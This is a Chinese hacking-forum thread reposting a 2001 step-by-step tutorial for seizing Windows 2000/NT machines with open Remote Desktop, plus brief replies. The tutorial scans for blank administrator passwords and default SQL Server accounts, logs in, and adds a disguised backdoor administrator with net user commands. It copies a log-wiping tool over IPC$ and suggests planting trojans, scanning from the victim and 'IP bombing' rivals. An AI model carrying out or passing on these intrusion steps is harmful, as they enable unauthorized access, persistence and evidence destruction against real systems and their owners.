论坛: 黑客进阶 标题: 建立你的3389肉鸡(菜鸟篇)(转) 复制本贴地址    
作者: 寂寞湖 [zhengzheng]    论坛用户   登录
www.sandflee.net  2001-12-6  灰色轨迹

(sandflee原创,转载请注明出处 9.10)
现在有输入法漏洞的机器已不多了,除非你遇见的是一个极不负责任的网管,呵呵!~这篇教程就是教你不用输入法漏洞就能用终端服务连接上开3389的机器,使它成为你的肉鸡。(下面的人要注意啊,不要搞国内的机器,我用来做示范的是台湾的机器,为何要用台湾的呢?等一下就知道啦)先做一下准备活动,呵呵!何为准备活动?就是找到要用的工具呀。(操作系统要求win2000/NT)
一.X-scan-v1.0,强大的扫描工具,简单易用,没有IP限制,呵呵?想到什么了?
二.WIN2000终端服务客户端(没这个怎么叫3389肉鸡呢?)
三.CleanIISLog.exe,榕哥的清日志的好东东!^o^(又买广告呢)
四.SQLEXEC.EXE
(以上软件均在本站有下载http://www.isgrey.com)
好!武器都准备好了就动手吧!
一。运行X-scan-v1.0工具包中的xscan_gui.exe,这是一个图形界面的扫描器,在“扫描设置”下选择“标准端口”;“NT弱口令用户”;“SQL-SERVER默认帐户”这三项,“运行参数”下填上你要扫描的IP地址段,例如:211.**.1.1-211.**.20.255(选的范围不要太大,要不很长时间都扫不完,也不要太少,少了可能找不到肉鸡),尽量不要选下面的“使用代理服务器”,线程要看你的网速如何,快的可以填50线程,我一般是用50的!YEAH!~~在“扫描前先PING主机”打上钩,“X-SCANNER所在位置”用默认的.\xscan.exe就可以了。再来“其他设置”下,“配置文件”处是.\dat\config.ini,点击旁边的“读取设置”,看到这个面板的框框都有东西了,就表示设置好!回到开始时的“扫描设置”面板下,点击下方的“开始扫描”。见到一个DOS窗口出来了,扫描正式开始!^O^,去泡泡MM吧,天南地北的吹一通,呵呵,看到扫描全部完成了,和你的MM说拜拜咯,开工~!!
看看扫描的报告,可能会很多的,一定要看清楚哦,要不肉鸡可能就这样给飞走啦。找找看,(主要是找有NT弱口令帐户又同时开了3389的机器)我就找到了一个例子:(不是真的哦,别照这个去试)

211.**.**.53: 【详细资料】 【主机摘要 -- 域名/主机名:"快辣侥" 操作系统:"Windows NT 5.0"】

NT弱口令帐户:1 开放端口:135,139,3389
看到了吗?NT弱口令帐户:1 开放端口:135,139,3389,!!!!!!!!!!
好了,再点“详细资料”进去看看:
【NT弱口令用户】:


Administrator: [空口令]
帐户类型:管理员(Administrator)
最后登录时间: GMT
错误口令次数: 0次
成功登录次数: 9次
用户ID: 0x000001f4, 组ID: 0x00000201
欢呼吧,!!!!!!!(如果看到“详细资料”里的帐户类型不是管理员的话,就找下一个吧,反正扫描报告多得很,总会找到一个的,我就试过扫描一次,就扫到了十多个这样的帐户,呵呵!~~)
知道了管理员的帐户是:Administrator,口令是空!到这时候,这台NT主机已差不多可以说是你的啦。

二.运行你的终端服务客户端,填上这个IP,按“连接”,等一下就看到了熟悉的WIN2000终端登陆界面,好,填上用户名:Administrator,口令不用填啦,按“确定”,等一下,哈哈!!!!!进去啦~~~~你会先看到一个叫你设定伺服器的画面,关掉,不要了。想干什么?首先我们为了防止管理员以后改了密码,我们先要给自己做一个管理员的帐户,点对方屏幕的开始--》程序--》附件--》命令提示符(这里的字有时是不同的,要看具体是什么系统,自己好好看看吧),依次输入:
C:\>net user owem lgg1234 /add(加入一个用户名为owem,密码:lgg1314的帐户)
指令執行成功。
C:\>net localgroup administrators owem /add(把owem加入到管理员组)
指令執行成功。
好了!到这里你已增加了一个管理员了,以后就算他把Administrator的密码改了你也可以用owem这个帐户进去耍啦,建议你先用net user看看人家的管理组有多少人,人多的话就尽管加个号吧,人少的加号时就要找一个近似于对方的名字来迷惑管理员,哈哈~`够绝了吧!
再来,在自己的命令提示符下依次输入:
D:\hacker>net use \\211.**.**.53\ipc$ "lgg1314" /user:"owem"(用IPC管道连接上去)
命令成功完成。
D:\hacker>copy CleanIISLog.exe \\211.**.**.53\c$(把CleanIISLog.exe拷到对方对方C盘下,有时会拒绝访问的,就拷到其他目录下吧)
已复制 1 个文件。
你也可以把木马拷上去,哈哈!~~~有意思!!5555555555.....
再来删除IPC的连接
D:\hacker>net use \\211.**.**.53\ipc$ /delete
\\211.**.**.53\ipc$ 已经删除。
先去看看管理员在不在,开始--》程序--》系统管理工具--》终端服务管理员,哈哈!`~没在!爽极啦,只有你一个连线!
下面该玩点什么呢?打开他的浏览器,去你知道的黑软地址下载你想用的工具,什么?装个流光?哈哈!~~`目标太大了吧?还是下个X-SCAN算了,下个IP炸弹??呵呵!好主意,`炸你的情敌去吧!用他下载的X-SCAN帮你去找更多的肉鸡!1YEAH!如果你在上面运行了程序,你退出时就只关终端窗口右上角的X就行了,关掉后你的程序还在运行呢!明天睡醒了来收你的战果吧!如果你要全部退出,就按开始--》关机--》登出****(你的帐户)。

还要补充的就是如果你扫到的是:SQL-SERVER默认帐户,没有NT管理员弱口令,但3389还是开了的话,就可以用SQLEXEC。EXE来连接上去,建立帐户也是用一样的命令,你也可以用3389登陆上去啦。

好!下课!!GOOD LOCK!





地主 发表时间: 05-08-06 15:20

回复: 幽灵 [xuwensheng]   论坛用户   登录
2001年的文章,还能用吗????

B1层 发表时间: 05-08-29 20:46

回复: shadowyue [shadowyue]   论坛用户   登录
顶顶顶

B2层 发表时间: 08-07-07 11:17

回复: wwwhao123com [vincexie]   论坛用户   登录


B3层 发表时间: 08-07-24 00:47

回复: FUNNYBOY [sdfc789]   论坛用户   登录
GB都不如挖掘鸡好使 现在是个人都关3389

B4层 发表时间: 08-07-25 08:37

回复: DarK-Z [bridex]   论坛用户   登录
3389现在可以溢出了.


B5层 发表时间: 08-07-28 22:18

回复: ___ys [___ys]   论坛用户   登录
无语。。。这种文章也发?

B6层 发表时间: 09-06-04 21:34

回复: 黑色 [hai4487]   论坛用户   登录
    我真不了解为什么还有这样麻烦的,诶 .......

B7层 发表时间: 09-06-11 23:20

回复: aming137 [aming137]   论坛用户   登录
......................................................

B8层 发表时间: 09-06-12 04:40

回复: ace [ace]   论坛用户   登录
学习了

B9层 发表时间: 09-10-03 12:57

回复: koolbaby [koolbaby]   论坛用户   登录
很好 啊

B10层 发表时间: 09-11-04 05:08

论坛: 黑客进阶

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号